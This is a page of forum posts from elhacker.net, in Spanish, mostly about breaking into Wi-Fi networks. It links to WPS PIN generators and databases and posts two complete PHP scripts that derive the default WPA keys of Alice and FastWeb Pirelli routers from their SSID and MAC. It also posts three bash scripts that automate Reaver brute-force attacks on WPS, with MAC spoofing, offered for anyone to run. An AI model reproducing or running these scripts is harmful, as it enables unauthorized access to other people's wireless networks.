elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Temas
Páginas: 1 2 [3] 4 5 6 7 8 9 10
21  Seguridad Informática / Hacking Wireless / WPSdb - Base de datos Online de Pines WPS en: 4 Febrero 2013, 08:09 am

WPSdb es un pequeño sitio que recauda información desinteresada sobre Pines de WPS, creando una Base de datos accesible para cualquier usuario, puedes realizar búsquedas según la MAC Address, adicionar pines, etc.

Algunas Imágenes:




22  Seguridad Informática / Wireless en Windows / EdimaxPIN en: 5 Enero 2013, 03:06 am

Hoy después de usar un par de equipos Edimax di con el algoritmo (jaja) para generar el WPS Pin que viene por defecto pre-cargado en los equipos, el cual es generado por la MAC Address del mismo. Algo muy simple...  :'(

Actualmente los Equipos afectados son:

  • Edimax 3g-6200n
  • Edimax 3g-6210n

Ejemplo aplicado anteriormente:


Posibles MAC's Afectadas:

00:1F:1F (Verificada), 00:0E:2E, 00:00:B4, 00:50:FC, 80:1F:02

DESCARGA: http://www.mediafire.com/?hxarcxza8wxcx1x
23  Seguridad Informática / Wireless en Linux / WiPhire - Wireless Penetration Testing Tool en: 15 Diciembre 2012, 21:56 pm

WiPhire es un script en bash  para hacer que el proceso de hacking inalámbrico sea mucho más fácil.

Programas Incluidos:

- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
- airdrop-ng (Requires directory /pentest/wireless/airdrop-ng/)
- xterm
- crunch (Requires directory /pentest/passwords/crunch)
- pyrit
- sslstrip
- arpspoof
- macchanger
- kate
- apache2 (Requires directory /etc/init.d/apache2)
- ettercap
- firefox (Trivial)


Descargar:
WiPhire

Alternativa:
MediaFire
24  Seguridad Informática / Hacking Wireless / Modo Monitor en Android con RTL8187L en: 15 Diciembre 2012, 21:28 pm

Tomó nota el investigador de seguridad Mike "dragorn" Kershaw , desarrollador del patrón oro en WiFi escáneres, Kismet, recientemente ha lanzado una herramienta para Android que permite a primas 802,11 capturas de fotogramas en el modo Wi-Fi monitor.


Poner un dispositivo WiFi en modo monitor le permite capturar todo tipo de datos interesantes acerca de la red inalámbrica a la que de otro modo sería invisible. Captura de Monitor de modo son de gran utilidad para el diagnóstico de red y pruebas de penetración, y conseguir que la capacidad en los dispositivos Android deben abrir un abanico de posibilidades muy interesantes.

Captura PCAP

La nueva herramienta, llamada simplemente " Android Captura PCAP ", hace las cosas un poco diferente de lo que cabría esperar. Para empezar, no utiliza la raíz o requieren una ROM personalizada a trabajar, lo cual es bastante inusual para una avanzada herramienta como esta.   Kershaw es generalmente contra de exigir el acceso root en las aplicaciones de Android, ya que él siente lo actual se maneja simplemente no es lo suficientemente seguro teniendo en cuenta la magnitud del daño a raíz de la aplicación habilitada puede hacer:

Citar
Dar a raíz aplicaciones android me aterra - pone 100% de confianza en que el desarrollador no ser malicioso, y que el mercado no ha presentado un proyecto clonado que es malicioso, y en los sistemas de desarrolladores para asegurarse de que nadie jamás puede empujar una actualización con las llaves que se convierte malicioso ... es una mala noticia por todas partes.

Kismet Blog

Kershaw tiene un punto sobre la forma en que actualmente se manejan acceso de root, y pese a algunos esfuerzos por cambiar lo que consideramos la norma , que sin duda tienen un riesgo cada vez que se permite el acceso root para una aplicación.

Pero cualquiera que haya trabajado con Wi-Fi bajo el estándar de GNU / Linux sabe que hacer nada con el hardware avanzado requiere acceso root. Entonces, ¿cómo Kershaw logran poner el equipo en modo monitor sin necesidad de acceso raíz o un kernel personalizado?

RTL8187 Hardware

El control de la incorporada en el hardware WiFi en Android habría ciertamente requiere acceso de root, y más que probables modificaciones a la propia ROM. Eso supone que el hardware WiFi de tu dispositivo en particular, incluso tenía soporte para modo monitor en su conductor, para empezar, que no está garantizado.

Así que para la captura PCAP, Kershaw decidió no apoyar el hardware WiFi interna en absoluto, y en su lugar sólo admiten dispositivos que utilizan la RTL8187 chipset conectado a través de USB. Al implementar el controlador RTL8187 en espacio de usuario, la aplicación no requiere de raíz, sólo se debe ejecutar en un dispositivo Android que soporta el modo USB host.

Modo USB host en Android es una especie de cajón de sastre, por desgracia. Aunque técnicamente cualquier cosa con Android Honeycomb o mejor debería apoyar host USB, las variaciones entre los fabricantes de hardware significa que su dispositivo Android en particular puede o no apoyar host USB, incluso si tiene un bastante nueva versión de Android.

En términos generales, Nexus dispositivos como el Nexus Galaxy Nexus 7 o debería funcionar, pero los dispositivos de otros fabricantes tendrán que ser probado en una base de caso por caso.

Demostración de instalación

Para realizar nuestra prueba de captura con captura PCAP, vamos a estar usando el Nexus tablet 7 y el RTL8187 basada Alfa AWUS036H adaptador WiFi.

Ambas piezas de hardware son excepcionalmente populares en sus respectivas comunidades, el Nexus 7 es uno de los más vendidos y mejor soportadas tabletas de Android jamás lanzado, y el AWUS036H ser una opción común para el trabajo avanzado WiFi en Linux.

Mientras que algunos se lamentan sin duda requisito de captura PCAP para un adaptador RTL8187 WiFi y el dispositivo USB huésped capaz Android, no se puede realmente reclamar cualquiera de estos requisitos son tan difíciles de acomodar.

También necesitaremos un USB On-The-Go (OTG) Cable adaptador, que le permite conectar un dispositivo USB estándar al puerto micro-USB que se encuentra en la mayoría de las tabletas de Android y teléfonos inteligentes (como la línea Nexus). Estos pueden tener para tan poco como $ 1 USD en sitios como Amazon.com o eBay.


Más Info; http://kismetwireless.net/android-pcap/
25  Programación / Java / Error en org.apache.commons.lang.enums al programar en Android en: 26 Noviembre 2012, 21:45 pm

Encontre un viejo proyecto en Java de Android y ahora que quiero abrirlo me da el error de la imagen, he modificado miles de cosas y sigue igual, ¿Alguna idea?
26  Comunicaciones / Android / Back|Track 5/Ubuntu/Debian/ en tu Android en: 26 Noviembre 2012, 04:19 am

Simplemente debemos seguir los pasos del video, bajar la versión Backtrack 5 ARM y listo, recuerda que debes ser root!

27  Comunicaciones / Android / Root en Samsung Galaxy SII en Android 4.0.3 UHLPJ? en: 24 Noviembre 2012, 21:00 pm
Resulta que me llego un nuevo SII pero el problema que vino con el kernel v4.0.3  :xD en ves del 2.2.3 y no he encontrado la forma de rootearlo, tienen alguna idea?

vi este programa pero los comentarios no son muy buenos y no quiero perder el fono.. http://galaxys2root.com/galaxy-s2-root/how-to-root-galaxy-s2-newworks-on-all-galaxy-s2-variants/
28  Seguridad Informática / Hacking Wireless / Alice AGPF WPA Discovery (Saber WPA redes Alice) en: 11 Noviembre 2012, 21:20 pm
Con este Script podemos saber la Clave WPA por defecto de las redes Alice:

Código:
<?php
/***************************************************************************
 *   Alice AGPF WPA Discovery                                              *
 *   by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net      *
 *   based on <http://wifiresearchers.wordpress.com/>                      *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/

/*
 * Tabella per il calcolo del seriale.
 *
 * First SSID digits => ( SN1, k, Q )
 */
$SN_TABLE   = array( '96' => array( '69102', 13, 96017051 ),
                     '93' => array( '69101', 13, 92398366 ),
                     '56' => array( '67902', 13, 54808800 ),
                     '55' => array( '67904', 8,  55164449 ),
                     '54' => array( '67903', 8,  52420689 ),
                     '48' => array( '67903', 8,  47896103 ),
                     '46' => array( '67902', 13, 39015145 ) );
/*
 * Numeri magici da utilizzare per il calcolo dell'SHA256.
 */
$ALIS       = "\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8";
/*
 * Tabella di conversione da hash a wpa.
 */
$CONV_TABLE = "0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuv".
              "wxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123";
/*
 * SSID della rete.
 */
$SSID       = "Alice-96154825";
/*
 * MAC address del router.
 */
$MAC        = "\x00\x23\x8E\x01\x02\x03";
/*
 * Calcolo il seriale in base al SSID e alla tabella dei valori noti.
 */
$SN         = SSID2SN($SSID);
/*
 * Calcolo SHA256( MagicN + SN + MAC )
 */
$hash       = SHA256( $ALIS.$SN.$MAC );
/*
 * Converto la stringa dell'hash in un array di byte.
 */
$bytes      = hash2bytes($hash);
/*
 * Trovo la WPA utilizzando i primi 24 byte dell'hash come indici della tabella di covnersione.
 */
$wpa   = "";
for( $i = 0; $i < 24; $i++ ){
    $wpa .= $CONV_TABLE[ $bytes[$i] ];
}

echo "WPA : $wpa\n";

/*
 * Funzione per risalire al seriale del router partendo dal suo SSID e utilizzando
 * le tabelle dei valori noti.
 */
function SSID2SN( $ssid ){
    global $SN_TABLE;
    /*
     * Prelevo il numero intero dall'SSID e ne prendo le prime due cifre
     * per verificare che il router sia presente nella tabella.
     */
    preg_match_all( "/^Alice\-([0-9]+)/", $ssid, $m );

    $ssidn = $m[1][0];
    $id    = substr( $ssidn, 0, 2 );

    if( isset( $SN_TABLE[$id] ) ){
        /*
         * Ok, il router è presente nella tabella, prelevo la prima parte del seriale e
         * le costanti k e Q da utilizzare nell'equazione finale.
         */
        $sn1 = $SN_TABLE[$id][0];
        $k   = $SN_TABLE[$id][1];
        $Q   = $SN_TABLE[$id][2];
        /*
         * La seconda parte del seriale equivale a :
         *      (SSID - Q) / k
         */
        $sn2 = ((int)$ssidn - $Q) / $k;
        /*
         * Restituisco il seriale completo.
         */
        return $sn1.'X'.sprintf( "%07s", $sn2 );
    }
    /*
     * Router non presente nella tabella.
     */
    else{
        die( "La serie 'Alice-$id******' non è presente nella tabella e non è supportata.\n" );
    }
}
/*
 * Funzione per il calcolo di un hash SHA256.
 */
function SHA256( $phrase ){
    return bin2hex( mhash( MHASH_SHA256, $phrase ) );
}
/*
 * Funzione per convertire un hash in un array di byte interi.
 */
function hash2bytes( $hash ){
    preg_match_all( "/[a-f0-9]{2}/i", $hash, $hash_bytes );
    $bytes = array();
    foreach( $hash_bytes[0] as $byte ){
        $bytes[] = hexdec($byte);
    }
   
    return $bytes;
}

?>
29  Seguridad Informática / Hacking Wireless / FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX) en: 11 Noviembre 2012, 21:20 pm
Simple Script para saber la clave WPA por defecto de las redes FASTWEB-1-00193EA1B2C3:

Código:
<?php
/***************************************************************************
 *   FastWeb Pirelli WPA Discovery                                         *
 *   by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net      *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/

/*
 * SSID di partenza.
 */
$ssid   = "FASTWEB-1-00193EA1B2C3";
/*
 * 20 byte costanti cablati nel firmware dei Pirelli Fastweb.
 */
$seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";
/*
 * Prelevo la parte finale del SSID.
 */
$sn     = split( '-', $ssid );
$sn     = $sn[2];
/*
 * La divido in gruppi di due caratteri, formando un array
 * di 6 rappresentazioni esadecimali di byte.
 */
preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes );
$sn_bytes = $sn_bytes[0];
/*
 * Inizializzo una stringa con il valore intero di questi byte.
 */
$str = "";
for( $i = 0; $i < 6; $i++ ){
    $str .= chr( hexdec( $sn_bytes[$i] ) );
}
echo "$str\n";

/*
 * Aggiungo alla stringa i 20 byte "magici".
 */
$str .= $seq_20;
/*
 * Ricavo i byte dell'hash md5 della stringa
 */
preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes );
$md5_bytes = $md5_bytes[0];
$long      = "";
/*
 * Converto i byte in sequenze binarie di 8 bit.
 */
foreach( $md5_bytes as $byte ){
    $long .= sprintf( "%08s", decbin( hexdec($byte) ) );
}
/*
 * Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero
 * di un gruppo sia maggiore di 0x0a, aggiungo 0x57.
 */
$hex_5 = array();
for( $i = 0; $i < 25; $i += 5 ){
    $n       = bindec( substr( $long, $i, 5 ) );
    $hex_5[] = $n > 0x0a ? $n + 0x57 : $n;
}
/*
 * Compongo la chiave.
 */
$wpa = "";
foreach( $hex_5 as $hex ){
    $wpa .= sprintf( "%02x", $hex );
}

print "WPA : $wpa\n";

?>
30  Seguridad Informática / Wireless en Linux / Reaver Automated Scripts (Scripts de Automatización de Reaver-WPS) en: 11 Noviembre 2012, 04:34 am
He encontrado dos scripts bash que todos pueden utilizar. Uno es de j0k3rr1 otro es de Vinay Gopinath y finalmente, el último es de hackling de Hak5 foros. Simplemente pegue el código en Ubuntu o Backtrack en un nuevo documento y guardarlo como un archivo. Sh. Entonces chmod 755 el archivo y ejecutarlo.

j0k3rr1

Código:
#!/bin/bash
# This is a linux bash script i wrote that runs best on Backtrack 5 KDE
# It automates reaver WPS bruteforce attack. simply save it to a text file (remove the .txt extension make #it .sh)
# then chmod +x <thefilename> and run it ./<filename>
# enjoy
 
# Attack WPS enabled routers
 
clear
tput setaf 2; echo "##################################################################################"
tput setaf 2; echo "#          ~Automate reaver WPS attack Bash script written by j0k3rr~            #"
tput setaf 2; echo "#    1-Tested on Backtrack 5 KDE                                                #"
tput setaf 2; echo "#    2-Make sure your wifi card is plugged in before starting the script        #"
tput setaf 2; echo "#    3-Any problems with the script feel free to contact me on twitter @j0k3rr1  #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "##################################################################################"
 
 
tput setaf 1; read -p "Press [Enter] to start hacking..."
 
clear
tput setaf 1; ifconfig | grep "wlan"
# Select your Wireless Interface ( wlan0 , wlan1, wlan2 )
 
tput setaf 2; read -p "Whats your Wireless interface? (Should be listed in red above) " winterface
 
# increase TX power to 30 dBm for wifi cards that can hanlde the shiznit
 
tput setaf 2; echo "Would you like to increase the TX Power of your wireless card to 30 dBm? Y/n"
read a
if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
        iw reg set BO
        iwconfig $winterface txpower 30
      else
      echo "continuing without changing the TX power"
fi
 
# Spoof Mac Address and put card into monitor mode
tput setaf 2; echo -e "Would you like to spoof the MAC address of your wifi card? Y/n"
 
read b
if [[ $b == "Y" || $b == "y" || $b = "" ]]; then
        wmac=00:11:22:33:44:55
        airmon-ng stop $winterface
        ifconfig $winterface down
        macchanger --mac 00:11:22:33:44:55 $winterface
        ifconfig $winterface up
        tput setaf 1; airmon-ng start $winterface
        else
        tput setaf 1; echo "continuing without changing the mac address"
        tput setaf 1; airmon-ng start $winterface
fi
 
 
tput setaf 2; read -p "Whats the monitor mode interface? (Usually mon0) " minterface
 
# Start airodump-ng to monitor the airwaves.
clear
tput setaf 1; echo  "About to start monitoring the air! "
sleep 3
konsole --hold -e wash -i $minterface
sleep 5
# Prompt user for Targets BSSID #
 
tput setaf 2; echo "Input the WPS enabled access points details: "
tput setaf 1; read -p "BSSID: " xBSSID
tput setaf 1; read -p "Channel number: " xCH
# Attack the Access point
 
konsole --hold -e reaver -i $minterface  -c $xCH -b $xBSSID -vv &
 
# End
 
clear
tput setaf 2; echo "[+] Process Started:"
tput setaf 2; echo "[+] Attacking " $xBSSID "on channel " $xCH " Goodluck and Happy Cracking"
wait

Hackling

Código:
#!/bin/bash
clear
echo "This script makes it easy to start a reaver attack"
echo ""
echo "[+] Do you need to setup a monitor interface? [y/n]"
read setup
if [[ $setup == 'y' ]]; then
#Setup the monitor interface
echo "[+] What Wireless interfaces do we have..."
iwconfig
echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
read interface
if [[ $interface == '' ]]; then
interface=wlan0 #Default to wlan0
fi
echo "[+] Starting monitor Mode for $interface"
airmon-ng start $interface
iwconfig
fi #End Mon Mode Setup Portion
#Start part of script that executes regardless
echo "[+] What monitor interface should I use? [mon0]"
read monInterface
if [[ $monInterface == '' ]]; then
monInterface=mon0 #Default to mon0
fi
#Spoof the Mon Mac
echo "[+] MacSpoofing $monInterface"
ifconfig $monInterface down
macchanger -r $monInterface
ifconfig $monInterface up
#Check for Targets
echo ""
echo "[+] ------------------------------------------------------[+]"
echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
echo "[+] ------------------------------------------------------[+]"
wash -i $monInterface
#Set Reaver Target
echo "[+] What is the MAC for the target AP?"
read target
#Set optional functions
reaver #to show the options available in terminal
echo "[+] reaver -i $monInterface -b $target"
echo "[+] Type any other reaver options you'd like besides the above"
read reaverVars
#Start REAVERINGGGGG!!!!
echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)"
reaver -i $monInterface -b $target $reaverVars
#Stop Monitor Mode Interface if the script set it up
if [[ $setup == 'y' ]]; then
echo ""
echo "[+] killing Monitor Interface"
airmon-ng stop $monInterface
fi

Vinay Gopinath

Código:
#! /bin/bash
#WiFi Attack Script, v1.0
#Author: Vinay Gopinath
#Date: 26 October, 2012
 
#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)
wireless_interface=wlan0
 
#The timeout (in seconds) for wash to search for WPS-enabled access points
wash_timeout=15
 
#Flag to allow user to choose target AP
allow_user_choice=1
 
#Delay between attack attempts
reaver_delay=0
 
#Check for root privileges
if (( EUID != 0 )); then
  echo "This script needs root"
  exit 1
fi
 
#Check for required commands
for command in airmon-ng wash reaver
do
  if [[ -z $(which $command) ]]; then
     echo "$command was not found"
     echo "To install $command, you may follow this link"
     echo "http://lmgtfy.com/?q=$command+installation"
     exit 1
  fi
done
 
echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"
 
#Check available interfaces and close previous monitor interfaces and wireless lan
for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
do
  if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
    echo "* Shutting down $interface"
    airmon-ng stop $interface > /dev/null
  fi
done
 
echo "* Starting a new monitor interface mon0"
airmon-ng start $wireless_interface > /dev/null
 
echo "Identifying WPS-enabled access points"
timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')
 
if [[ -n $(echo $APs) ]]; then
   if  (( $allow_user_choice )); then
      n=1
      echo "The following access points were detected"
      for ap in $APs
      do
        echo "* $n: $ap"
        ((n++))
      done
      read -p "Enter your choice: " choice
      if [[ $choice -le $n ]]; then
        chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
echo "You have chosen $chosen_ap"
      else
echo "Invalid choice!"
exit 1
      fi
   else
      chosen_ap=$(echo "${APs}" | head -n1)
      echo "Proceeding with choice 1: $chosen_ap"
   fi
   tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
   rm washOutput.txt
   channel=$(echo $tempLine | cut -f2 -d' ')
   mac_address=$(echo $tempLine | cut -f1 -d' ')
   echo "Starting reaver"
   echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
   echo "AP name: $chosen_ap"
   echo "Channel: $channel"
   echo "MAC Address: $mac_address"
   reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
else
   echo "No networks found. Consider increasing the wash timeout. Terminating"
   exit 1
fi
Páginas: 1 2 [3] 4 5 6 7 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines